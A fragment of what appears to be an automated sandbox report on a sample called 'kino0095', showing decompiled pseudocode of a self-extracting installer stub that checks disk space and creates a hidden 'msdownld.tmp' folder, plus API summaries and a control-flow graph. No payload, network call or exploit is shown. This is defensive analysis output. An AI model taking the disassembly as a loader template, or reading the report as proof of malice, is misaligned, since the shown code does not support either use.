                                                                                                                                                                                                                                    																	if(_t68 == 0) {
                                                                                                                                                                                                                                    																		goto L28;
                                                                                                                                                                                                                                    																	} else {
                                                                                                                                                                                                                                    																		__eflags = _t68 - 0x19000;
                                                                                                                                                                                                                                    																		if(_t68 >= 0x19000) {
																			L30:
																			_push(0);
																			_t103 = 3;
																			_t49 = E010B597D( &_v268, _t103, 1);
																			__eflags = _t49;
																			if(_t49 != 0) {
																				L33:
																				_t50 = E010B2630(0,  &_v268, 1);
																				__eflags = _t50;
																				if(_t50 != 0) {
																					GetWindowsDirectoryA( &_v268, 0x104);
																				}
																				_t88 =  &_v268;
																				E010B658A(_t88, 0x104, "msdownld.tmp");
																				_t53 = GetFileAttributesA( &_v268);
																				__eflags = _t53 - 0xffffffff;
																				if(_t53 != 0xffffffff) {
																					_t54 = _t53 & 0x00000010;
																					__eflags = _t54;
																				} else {
																					_t54 = CreateDirectoryA( &_v268, 0);
																				}
																				__eflags = _t54;
																				if(_t54 != 0) {
																					SetFileAttributesA( &_v268, 2);
																					_push(_t88);
																					_t109 = 0x10b91e4;
																					E010B1781(0x10b91e4, 0x104, _t88,  &_v268);
																					_t101 = 1;
																					_t59 = E010B5467(0x10b91e4, 1, 0);
																					__eflags = _t59;
																					if(_t59 != 0) {
																						goto L45;
																					} else {
																						_t60 = _v268;
																						goto L42;
																					}
																				} else {
																					_t60 = _v268 + 1;
																					_v265 = 0;
																					_v268 = _t60;
																					goto L42;
																				}
																			} else {
																				_t65 = E010B2630(0,  &_v268, 1);
																				__eflags = _t65;
																				if(_t65 != 0) {
																					goto L28;
																				} else {
																					_t67 = E010B597D( &_v268, 1, 1, 0);
																					__eflags = _t67;
																					if(_t67 == 0) {
																						goto L28;
																					} else {
																						goto L33;
																					}
																				}
																			}
																		} else {
																			goto L28;
																		}
																	}
																}
															}
														}
													} else {
														goto L22;
													}
												}
												goto L47;
												L42:
												__eflags = _t60 - 0x5a;
											} while (_t60 <= 0x5a);
										}
										goto L43;
									} else {
										_t101 = 1;
										_t69 = E010B5467(0x10b91e4, 1, 3); // executed
										__eflags = _t69;
										if(_t69 != 0) {
											goto L45;
										} else {
											_t82 = 0x10b91e4;
											_t70 = E010B2630(0, 0x10b91e4, 1);
											__eflags = _t70;
											if(_t70 != 0) {
												goto L19;
											} else {
												_t101 = 1;
												_t82 = 0x10b91e4;
												_t71 = E010B5467(0x10b91e4, 1, 1);
												__eflags = _t71;
												if(_t71 != 0) {
													goto L45;
												} else {
													do {
														goto L19;
														L43:
														GetWindowsDirectoryA( &_v268, 0x104);
														_push(4);
														_t101 = 3;
														_t82 =  &_v268;
														_t44 = E010B597D(_t82, _t101, 1);
														__eflags = _t44;
													} while (_t44 != 0);
													goto L2;
												}
											}
										}
									}
								}
							}
						} else {
							__eflags = _t35 - 0x5c;
							if(_t35 != 0x5c) {
								L10:
								_t72 = 1;
							} else {
								__eflags =  *0x10b8b3f - _t35; // 0x0
								_t72 = 0;
								if(__eflags != 0) {
									goto L10;
								}
							}
							_t101 = 0;
							_t73 = E010B5467(0x10b8b3e, 0, _t72);
							__eflags = _t73;
							if(_t73 != 0) {
								L45:
								_t38 = 1;
							} else {
								_t101 = 0x4be;
								E010B44B9(0, 0x4be, 0, 0, 0x10, 0);
								goto L2;
							}
						}
					} else {
						_t101 = 0x4b1;
						E010B44B9(0, 0x4b1, 0, 0, 0x10, 0);
						LocalFree(_t109);
						 *0x10b9124 = 0x80070714;
						goto L2;
                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                    				} else {
                                                                                                                                                                                                                                    					_t101 = 0x4b5;
                                                                                                                                                                                                                                    					E010B44B9(0, 0x4b5, 0, 0, 0x10, 0);
                                                                                                                                                                                                                                    					 *0x10b9124 = E010B6285();
                                                                                                                                                                                                                                    					L2:
                                                                                                                                                                                                                                    					_t38 = 0;
                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                    				L47:
                                                                                                                                                                                                                                    				return E010B6CE0(_t38, 0, _v8 ^ _t110, _t101, 1, _t109);
                                                                                                                                                                                                                                    			}
[Address column of the decompiled listing above, detached from its code lines during extraction: the instructions lie in the range 0x010b55ab - 0x010b58b5 (listed in listing order, not memory order); entries of 0x00000000 mark listing lines with no instruction address of their own.]
                                                                                                                                                                                                                                    0x010b581f
                                                                                                                                                                                                                                    0x010b5791
                                                                                                                                                                                                                                    0x010b5797
                                                                                                                                                                                                                                    0x010b579c
                                                                                                                                                                                                                                    0x010b579e
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x010b57a0
                                                                                                                                                                                                                                    0x010b57a9
                                                                                                                                                                                                                                    0x010b57ae
                                                                                                                                                                                                                                    0x010b57b0
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x010b57b0
                                                                                                                                                                                                                                    0x010b579e
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x010b5769
                                                                                                                                                                                                                                    0x010b5762
                                                                                                                                                                                                                                    0x010b5753
                                                                                                                                                                                                                                    0x010b574f
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x010b572e
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x010b5864
                                                                                                                                                                                                                                    0x010b5864
                                                                                                                                                                                                                                    0x010b5864
                                                                                                                                                                                                                                    0x010b5717
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x010b56c3
                                                                                                                                                                                                                                    0x010b56c5
                                                                                                                                                                                                                                    0x010b56c9
                                                                                                                                                                                                                                    0x010b56ce
                                                                                                                                                                                                                                    0x010b56d0
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x010b56d6
                                                                                                                                                                                                                                    0x010b56d6
                                                                                                                                                                                                                                    0x010b56d8
                                                                                                                                                                                                                                    0x010b56dd
                                                                                                                                                                                                                                    0x010b56df
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x010b56e1
                                                                                                                                                                                                                                    0x010b56e2
                                                                                                                                                                                                                                    0x010b56e4
                                                                                                                                                                                                                                    0x010b56e6
                                                                                                                                                                                                                                    0x010b56eb
                                                                                                                                                                                                                                    0x010b56ed
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x010b56f3
                                                                                                                                                                                                                                    0x010b56f3
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x010b586c
                                                                                                                                                                                                                                    0x010b5878
                                                                                                                                                                                                                                    0x010b587e
                                                                                                                                                                                                                                    0x010b5882
                                                                                                                                                                                                                                    0x010b5883
                                                                                                                                                                                                                                    0x010b5889
                                                                                                                                                                                                                                    0x010b588e
                                                                                                                                                                                                                                    0x010b588e
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x010b5896
                                                                                                                                                                                                                                    0x010b56ed
                                                                                                                                                                                                                                    0x010b56df
                                                                                                                                                                                                                                    0x010b56d0
                                                                                                                                                                                                                                    0x010b56c1
                                                                                                                                                                                                                                    0x010b56a8
                                                                                                                                                                                                                                    0x010b565b
                                                                                                                                                                                                                                    0x010b565b
                                                                                                                                                                                                                                    0x010b565d
                                                                                                                                                                                                                                    0x010b5669
                                                                                                                                                                                                                                    0x010b5669
                                                                                                                                                                                                                                    0x010b565f
                                                                                                                                                                                                                                    0x010b565f
                                                                                                                                                                                                                                    0x010b5665
                                                                                                                                                                                                                                    0x010b5667
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x010b5667
                                                                                                                                                                                                                                    0x010b566c
                                                                                                                                                                                                                                    0x010b5673
                                                                                                                                                                                                                                    0x010b5678
                                                                                                                                                                                                                                    0x010b567a
                                                                                                                                                                                                                                    0x010b589b
                                                                                                                                                                                                                                    0x010b589b
                                                                                                                                                                                                                                    0x010b5680
                                                                                                                                                                                                                                    0x010b5685
                                                                                                                                                                                                                                    0x010b568c
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x010b568c
                                                                                                                                                                                                                                    0x010b567a
                                                                                                                                                                                                                                    0x010b560e
                                                                                                                                                                                                                                    0x010b5613
                                                                                                                                                                                                                                    0x010b561a
                                                                                                                                                                                                                                    0x010b5620
                                                                                                                                                                                                                                    0x010b5626
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x010b5626
                                                                                                                                                                                                                                    0x010b55db
                                                                                                                                                                                                                                    0x010b55e0
                                                                                                                                                                                                                                    0x010b55e7
                                                                                                                                                                                                                                    0x010b55f1
                                                                                                                                                                                                                                    0x010b55f6
                                                                                                                                                                                                                                    0x010b55f6
                                                                                                                                                                                                                                    0x010b55f6
                                                                                                                                                                                                                                    0x010b58b7
                                                                                                                                                                                                                                    0x010b58c7

APIs
  • Part of subcall function 010B468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 010B46A0
  • Part of subcall function 010B468F: SizeofResource.KERNEL32(00000000,00000000,?,010B2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 010B46A9
  • Part of subcall function 010B468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 010B46C3
  • Part of subcall function 010B468F: LoadResource.KERNEL32(00000000,00000000,?,010B2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 010B46CC
  • Part of subcall function 010B468F: LockResource.KERNEL32(00000000,?,010B2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 010B46D3
  • Part of subcall function 010B468F: memcpy_s.MSVCRT ref: 010B46E5
  • Part of subcall function 010B468F: FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 010B46EF
• LocalAlloc.KERNEL32(00000040,00000001,00000000,?,00000002,00000000), ref: 010B55CF
• lstrcmpA.KERNEL32(00000000,<None>,00000000), ref: 010B5638
• LocalFree.KERNEL32(00000000), ref: 010B564C
• LocalFree.KERNEL32(00000000,00000000,00000000,00000010,00000000,00000000), ref: 010B5620
  • Part of subcall function 010B44B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 010B4518
  • Part of subcall function 010B44B9: MessageBoxA.USER32(?,?,doza2,00010010), ref: 010B4554
  • Part of subcall function 010B6285: GetLastError.KERNEL32(010B5BBC), ref: 010B6285
• GetTempPathA.KERNEL32(00000104,C:\Users\user\AppData\Local\Temp\IXP001.TMP\), ref: 010B56B9
• GetDriveTypeA.KERNEL32(0000005A,?,A:\), ref: 010B571E
• GetFileAttributesA.KERNEL32(0000005A,?,A:\), ref: 010B5737
• GetWindowsDirectoryA.KERNEL32(0000005A,00000104,00000000,?,A:\), ref: 010B57CD
                                                                                                                                                                                                                                    • GetFileAttributesA.KERNEL32(0000005A,msdownld.tmp,00000000,?,A:\), ref: 010B57EF
                                                                                                                                                                                                                                    • CreateDirectoryA.KERNEL32(0000005A,00000000,?,A:\), ref: 010B5802
                                                                                                                                                                                                                                      • Part of subcall function 010B2630: GetWindowsDirectoryA.KERNEL32(?,00000104,00000000), ref: 010B2654
                                                                                                                                                                                                                                    • SetFileAttributesA.KERNEL32(0000005A,00000002,?,A:\), ref: 010B5830
                                                                                                                                                                                                                                      • Part of subcall function 010B6517: FindResourceA.KERNEL32(010B0000,000007D6,00000005), ref: 010B652A
                                                                                                                                                                                                                                      • Part of subcall function 010B6517: LoadResource.KERNEL32(010B0000,00000000,?,?,010B2EE8,00000000,010B19E0,00000547,0000083E,?,?,?,?,?,?,?), ref: 010B6538
                                                                                                                                                                                                                                      • Part of subcall function 010B6517: DialogBoxIndirectParamA.USER32(010B0000,00000000,00000547,010B19E0,00000000), ref: 010B6557
                                                                                                                                                                                                                                      • Part of subcall function 010B6517: FreeResource.KERNEL32(00000000,?,?,010B2EE8,00000000,010B19E0,00000547,0000083E,?,?,?,?,?,?,?,00000002), ref: 010B6560
                                                                                                                                                                                                                                    • GetWindowsDirectoryA.KERNEL32(0000005A,00000104,?,A:\), ref: 010B5878
                                                                                                                                                                                                                                      • Part of subcall function 010B597D: GetCurrentDirectoryA.KERNEL32(00000104,?,00000000,00000000), ref: 010B59A8
                                                                                                                                                                                                                                      • Part of subcall function 010B597D: SetCurrentDirectoryA.KERNELBASE(?), ref: 010B59AF
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000001.00000002.437433001.00000000010B1000.00000020.00000001.01000000.00000004.sdmp, Offset: 010B0000, based on PE: true
                                                                                                                                                                                                                                     • Associated: 00000001.00000002.437414550.00000000010B0000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                     • Associated: 00000001.00000002.437491566.00000000010B8000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                     • Associated: 00000001.00000002.437501771.00000000010BA000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                     • Associated: 00000001.00000002.437501771.00000000010BC000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_1_2_10b0000_kino0095.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: Resource$Directory$Free$AttributesFileFindLoadLocalWindows$Current$AllocCreateDialogDriveErrorIndirectLastLockMessageParamPathSizeofStringTempTypelstrcmpmemcpy_s
                                                                                                                                                                                                                                    • String ID: <None>$A:\$C:\Users\user\AppData\Local\Temp\IXP001.TMP\$RUNPROGRAM$Z$msdownld.tmp
                                                                                                                                                                                                                                    • API String ID: 2436801531-337015389
                                                                                                                                                                                                                                    • Opcode ID: a8712b4149d8a8f24493e3a860e8f8dd2ef2b4817e3324e33be06f8acc01916c
                                                                                                                                                                                                                                    • Instruction ID: f4ad26e9b57f0a777e9a2df1de43f6c4c8d84f370e4ede3f5b4d667bb1503006
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: a8712b4149d8a8f24493e3a860e8f8dd2ef2b4817e3324e33be06f8acc01916c
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 24812BB0B042059ADB71AB79ACD4BFE76ADAF65304F0400E5E6C6E3181EF758DC18B50
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                     Control-flow Graph (nodes marked Executed / Not Executed)
                                                                                                                                                                                                                                    control_flow_graph 324 10b597d-10b59b9 GetCurrentDirectoryA SetCurrentDirectoryA 325 10b59bb-10b59d8 call 10b44b9 call 10b6285 324->325 326 10b59dd-10b5a1b GetDiskFreeSpaceA 324->326 341 10b5c05-10b5c14 call 10b6ce0 325->341 327 10b5ba1-10b5bde memset call 10b6285 GetLastError FormatMessageA 326->327 328 10b5a21-10b5a4a MulDiv 326->328 338 10b5be3-10b5bfc call 10b44b9 SetCurrentDirectoryA 327->338 328->327 331 10b5a50-10b5a6c GetVolumeInformationA 328->331 335 10b5a6e-10b5ab0 memset call 10b6285 GetLastError FormatMessageA 331->335 336 10b5ab5-10b5aca SetCurrentDirectoryA 331->336 335->338 340 10b5acc-10b5ad1 336->340 351 10b5c02 338->351 344 10b5ad3-10b5ad8 340->344 345 10b5ae2-10b5ae4 340->345 344->345 347 10b5ada-10b5ae0 344->347 349 10b5ae7-10b5af8 345->349 350 10b5ae6 345->350 347->340 347->345 353 10b5af9-10b5afb 349->353 350->349 356 10b5c04 351->356 354 10b5afd-10b5b03 353->354 355 10b5b05-10b5b08 353->355 354->353 354->355 357 10b5b0a-10b5b1b call 10b44b9 355->357 358 10b5b20-10b5b27 355->358 356->341 357->351 360 10b5b29-10b5b33 358->360 361 10b5b52-10b5b5b 358->361 360->361 363 10b5b35-10b5b50 360->363 364 10b5b62-10b5b6d 361->364 363->364 365 10b5b6f-10b5b74 364->365 366 10b5b76-10b5b7d 364->366 367 10b5b85 365->367 368 10b5b7f-10b5b81 366->368 369 10b5b83 366->369 370 10b5b87-10b5b94 call 10b268b 367->370 371 10b5b96-10b5b9f 367->371 368->367 369->367 370->356 371->356
                                                                                                                                                                                                                                    C-Code - Quality: 96%
                                                                                                                                                                                                                                    			E010B597D(CHAR* __ecx, signed char __edx, void* __edi, intOrPtr _a4) {
                                                                                                                                                                                                                                    				signed int _v8;
                                                                                                                                                                                                                                    				char _v16;
                                                                                                                                                                                                                                    				char _v276;
                                                                                                                                                                                                                                    				char _v788;
                                                                                                                                                                                                                                    				long _v792;
                                                                                                                                                                                                                                    				long _v796;
                                                                                                                                                                                                                                    				long _v800;
                                                                                                                                                                                                                                    				signed int _v804;
                                                                                                                                                                                                                                    				long _v808;
                                                                                                                                                                                                                                    				int _v812;
                                                                                                                                                                                                                                    				long _v816;
                                                                                                                                                                                                                                    				long _v820;
                                                                                                                                                                                                                                    				void* __ebx;
                                                                                                                                                                                                                                    				void* __esi;
                                                                                                                                                                                                                                    				signed int _t46;
                                                                                                                                                                                                                                    				int _t50;
                                                                                                                                                                                                                                    				signed int _t55;
                                                                                                                                                                                                                                    				void* _t66;
                                                                                                                                                                                                                                    				int _t69;
                                                                                                                                                                                                                                    				signed int _t73;
                                                                                                                                                                                                                                    				signed short _t78;
                                                                                                                                                                                                                                    				signed int _t87;
                                                                                                                                                                                                                                    				signed int _t101;
                                                                                                                                                                                                                                    				int _t102;
                                                                                                                                                                                                                                    				unsigned int _t103;
                                                                                                                                                                                                                                    				unsigned int _t105;
                                                                                                                                                                                                                                    				signed int _t111;
                                                                                                                                                                                                                                    				long _t112;
                                                                                                                                                                                                                                    				signed int _t116;
                                                                                                                                                                                                                                    				CHAR* _t118;
                                                                                                                                                                                                                                    				signed int _t119;
                                                                                                                                                                                                                                     				signed int _t120;
                                                                                                                                                                                                                                     				signed int _t110; // string-resource id handed to the message helper
                                                                                                                                                                                                                                     				void* _t114;      // saved __edi
                                                                                                                                                                                                                                    
                                                                                                                                                                                                                                    				_t114 = __edi;
                                                                                                                                                                                                                                    				_t46 =  *0x10b8004; // 0x72151d89
                                                                                                                                                                                                                                    				_v8 = _t46 ^ _t120;
                                                                                                                                                                                                                                    				_v804 = __edx;
                                                                                                                                                                                                                                    				_t118 = __ecx;
                                                                                                                                                                                                                                     				GetCurrentDirectoryA(0x104,  &_v276); // remember the caller's directory so it can be restored on every exit path
                                                                                                                                                                                                                                     				_t50 = SetCurrentDirectoryA(_t118); // executed; switch to the extraction directory passed in __ecx
                                                                                                                                                                                                                                    				if(_t50 != 0) {
                                                                                                                                                                                                                                    					_push(__edi);
                                                                                                                                                                                                                                    					_v796 = 0;
                                                                                                                                                                                                                                    					_v792 = 0;
                                                                                                                                                                                                                                    					_v800 = 0;
                                                                                                                                                                                                                                    					_v808 = 0;
                                                                                                                                                                                                                                     					_t55 = GetDiskFreeSpaceA(0,  &_v796,  &_v792,  &_v800,  &_v808); // executed; sectors/cluster, bytes/sector, free clusters, total clusters of the current drive
                                                                                                                                                                                                                                    					__eflags = _t55;
                                                                                                                                                                                                                                    					if(_t55 == 0) {
                                                                                                                                                                                                                                    						L29:
                                                                                                                                                                                                                                     						memset( &_v788, 0, 0x200);
                                                                                                                                                                                                                                     						 *0x10b9124 = E010B6285(); // helper that reads GetLastError (see the subcall summary above)
                                                                                                                                                                                                                                     						FormatMessageA(0x1000, 0, GetLastError(), 0,  &_v788, 0x200, 0); // FORMAT_MESSAGE_FROM_SYSTEM: system text for the last error
                                                                                                                                                                                                                                     						_t110 = 0x4b0; // string-resource id for the error dialog
                                                                                                                                                                                                                                    						L30:
                                                                                                                                                                                                                                    						__eflags = 0;
                                                                                                                                                                                                                                     						E010B44B9(0, _t110, _t118,  &_v788, 0x10, 0); // LoadStringA/MessageBoxA wrapper (see the subcall summary above): report the error
                                                                                                                                                                                                                                     						SetCurrentDirectoryA( &_v276); // restore the caller's directory before failing
                                                                                                                                                                                                                                    						L31:
                                                                                                                                                                                                                                    						_t66 = 0;
                                                                                                                                                                                                                                    						__eflags = 0;
                                                                                                                                                                                                                                    						L32:
                                                                                                                                                                                                                                    						_pop(_t114);
                                                                                                                                                                                                                                    						goto L33;
                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                     					_t69 = _v792 * _v796; // bytes per cluster = bytes/sector * sectors/cluster
                                                                                                                                                                                                                                     					_v812 = _t69;
                                                                                                                                                                                                                                     					_t116 = MulDiv(_t69, _v800, 0x400); // free space in KB = bytes/cluster * free clusters / 1024
                                                                                                                                                                                                                                     					__eflags = _t116;
                                                                                                                                                                                                                                     					if(_t116 == 0) { // no free space is reported the same way as an API failure
                                                                                                                                                                                                                                    						goto L29;
                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                    					_t73 = GetVolumeInformationA(0, 0, 0, 0,  &_v820,  &_v816, 0, 0); // executed
                                                                                                                                                                                                                                    					__eflags = _t73;
                                                                                                                                                                                                                                    					if(_t73 != 0) {
                                                                                                                                                                                                                                    						SetCurrentDirectoryA( &_v276); // executed
                                                                                                                                                                                                                                    						_t101 =  &_v16;
                                                                                                                                                                                                                                    						_t111 = 6;
                                                                                                                                                                                                                                    						_t119 = _t118 - _t101;
                                                                                                                                                                                                                                    						__eflags = _t119;
                                                                                                                                                                                                                                    						while(1) {
                                                                                                                                                                                                                                    							_t22 = _t111 - 4; // 0x2
                                                                                                                                                                                                                                    							__eflags = _t22;
                                                                                                                                                                                                                                    							if(_t22 == 0) {
                                                                                                                                                                                                                                    								break;
                                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                                    							_t87 =  *((intOrPtr*)(_t119 + _t101));
                                                                                                                                                                                                                                    							__eflags = _t87;
                                                                                                                                                                                                                                    							if(_t87 == 0) {
                                                                                                                                                                                                                                    								break;
                                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                                    							 *_t101 = _t87;
                                                                                                                                                                                                                                    							_t101 = _t101 + 1;
                                                                                                                                                                                                                                    							_t111 = _t111 - 1;
                                                                                                                                                                                                                                    							__eflags = _t111;
                                                                                                                                                                                                                                    							if(_t111 != 0) {
                                                                                                                                                                                                                                    								continue;
                                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                                    							break;
                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                    						__eflags = _t111;
                                                                                                                                                                                                                                    						if(_t111 == 0) {
                                                                                                                                                                                                                                    							_t101 = _t101 - 1;
                                                                                                                                                                                                                                    							__eflags = _t101;
                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                    						 *_t101 = 0;
                                                                                                                                                                                                                                    						_t112 = 0x200;
                                                                                                                                                                                                                                    						_t102 = _v812;
                                                                                                                                                                                                                                    						_t78 = 0;
                                                                                                                                                                                                                                    						_t118 = 8;
                                                                                                                                                                                                                                    						while(1) {
                                                                                                                                                                                                                                    							__eflags = _t102 - _t112;
                                                                                                                                                                                                                                    							if(_t102 == _t112) {
                                                                                                                                                                                                                                    								break;
                                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                                    							_t112 = _t112 + _t112;
                                                                                                                                                                                                                                    							_t78 = _t78 + 1;
                                                                                                                                                                                                                                    							__eflags = _t78 - _t118;
                                                                                                                                                                                                                                    							if(_t78 < _t118) {
                                                                                                                                                                                                                                    								continue;
                                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                                    							break;
                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                    						__eflags = _t78 - _t118;
                                                                                                                                                                                                                                    						if(_t78 != _t118) {
                                                                                                                                                                                                                                    							__eflags =  *0x10b9a34 & 0x00000008;
                                                                                                                                                                                                                                    							if(( *0x10b9a34 & 0x00000008) == 0) {
                                                                                                                                                                                                                                    								L20:
                                                                                                                                                                                                                                    								_t103 =  *0x10b9a38; // 0x0
                                                                                                                                                                                                                                    								_t110 =  *((intOrPtr*)(0x10b89e0 + (_t78 & 0x0000ffff) * 4));
                                                                                                                                                                                                                                    								L21:
                                                                                                                                                                                                                                    								__eflags = (_v804 & 0x00000003) - 3;
                                                                                                                                                                                                                                    								if((_v804 & 0x00000003) != 3) {
                                                                                                                                                                                                                                    									__eflags = _v804 & 0x00000001;
                                                                                                                                                                                                                                    									if((_v804 & 0x00000001) == 0) {
                                                                                                                                                                                                                                    										__eflags = _t103 - _t116;
                                                                                                                                                                                                                                    									} else {
                                                                                                                                                                                                                                    										__eflags = _t110 - _t116;
                                                                                                                                                                                                                                    									}
                                                                                                                                                                                                                                    								} else {
                                                                                                                                                                                                                                    									__eflags = _t103 + _t110 - _t116;
                                                                                                                                                                                                                                    								}
                                                                                                                                                                                                                                    								if(__eflags <= 0) {
                                                                                                                                                                                                                                    									 *0x10b9124 = 0;
                                                                                                                                                                                                                                    									_t66 = 1;
                                                                                                                                                                                                                                    								} else {
                                                                                                                                                                                                                                    									_t66 = E010B268B(_a4, _t110, _t103,  &_v16);
                                                                                                                                                                                                                                    								}
                                                                                                                                                                                                                                    								goto L32;
                                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                                    							__eflags = _v816 & 0x00008000;
                                                                                                                                                                                                                                    							if((_v816 & 0x00008000) == 0) {
                                                                                                                                                                                                                                    								goto L20;
                                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                                    							_t105 =  *0x10b9a38; // 0x0
                                                                                                                                                                                                                                    							_t110 =  *((intOrPtr*)(0x10b89e0 + (_t78 & 0x0000ffff) * 4)) +  *((intOrPtr*)(0x10b89e0 + (_t78 & 0x0000ffff) * 4));
                                                                                                                                                                                                                                    							_t103 = (_t105 >> 2) +  *0x10b9a38;
                                                                                                                                                                                                                                    							goto L21;
                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                    						_t110 = 0x4c5;
                                                                                                                                                                                                                                    						E010B44B9(0, 0x4c5, 0, 0, 0x10, 0);
                                                                                                                                                                                                                                    						goto L31;
                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                    					memset( &_v788, 0, 0x200);
                                                                                                                                                                                                                                    					 *0x10b9124 = E010B6285();
                                                                                                                                                                                                                                    					FormatMessageA(0x1000, 0, GetLastError(), 0,  &_v788, 0x200, 0);
                                                                                                                                                                                                                                    					_t110 = 0x4f9;
                                                                                                                                                                                                                                    					goto L30;
                                                                                                                                                                                                                                    				} else {
                                                                                                                                                                                                                                    					_t110 = 0x4bc;
                                                                                                                                                                                                                                    					E010B44B9(0, 0x4bc, 0, 0, 0x10, 0);
                                                                                                                                                                                                                                    					 *0x10b9124 = E010B6285();
                                                                                                                                                                                                                                    					_t66 = 0;
                                                                                                                                                                                                                                    					L33:
                                                                                                                                                                                                                                    					return E010B6CE0(_t66, 0, _v8 ^ _t120, _t110, _t114, _t118);
                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                    			}
                                                                                                                                                                                                                                    0x010b5c04
                                                                                                                                                                                                                                    0x010b5a27
                                                                                                                                                                                                                                    0x010b5a3a
                                                                                                                                                                                                                                    0x010b5a46
                                                                                                                                                                                                                                    0x010b5a48
                                                                                                                                                                                                                                    0x010b5a4a
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x010b5a64
                                                                                                                                                                                                                                    0x010b5a6a
                                                                                                                                                                                                                                    0x010b5a6c
                                                                                                                                                                                                                                    0x010b5abc
                                                                                                                                                                                                                                    0x010b5ac2
                                                                                                                                                                                                                                    0x010b5ac9
                                                                                                                                                                                                                                    0x010b5aca
                                                                                                                                                                                                                                    0x010b5aca
                                                                                                                                                                                                                                    0x010b5acc
                                                                                                                                                                                                                                    0x010b5acc
                                                                                                                                                                                                                                    0x010b5acf
                                                                                                                                                                                                                                    0x010b5ad1
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x010b5ad3
                                                                                                                                                                                                                                    0x010b5ad6
                                                                                                                                                                                                                                    0x010b5ad8
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x010b5ada
                                                                                                                                                                                                                                    0x010b5adc
                                                                                                                                                                                                                                    0x010b5add
                                                                                                                                                                                                                                    0x010b5add
                                                                                                                                                                                                                                    0x010b5ae0
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x010b5ae0
                                                                                                                                                                                                                                    0x010b5ae2
                                                                                                                                                                                                                                    0x010b5ae4
                                                                                                                                                                                                                                    0x010b5ae6
                                                                                                                                                                                                                                    0x010b5ae6
                                                                                                                                                                                                                                    0x010b5ae6
                                                                                                                                                                                                                                    0x010b5ae9
                                                                                                                                                                                                                                    0x010b5aeb
                                                                                                                                                                                                                                    0x010b5af0
                                                                                                                                                                                                                                    0x010b5af6
                                                                                                                                                                                                                                    0x010b5af8
                                                                                                                                                                                                                                    0x010b5af9
                                                                                                                                                                                                                                    0x010b5af9
                                                                                                                                                                                                                                    0x010b5afb
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x010b5afd
                                                                                                                                                                                                                                    0x010b5aff
                                                                                                                                                                                                                                    0x010b5b00
                                                                                                                                                                                                                                    0x010b5b03
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x010b5b03
                                                                                                                                                                                                                                    0x010b5b05
                                                                                                                                                                                                                                    0x010b5b08
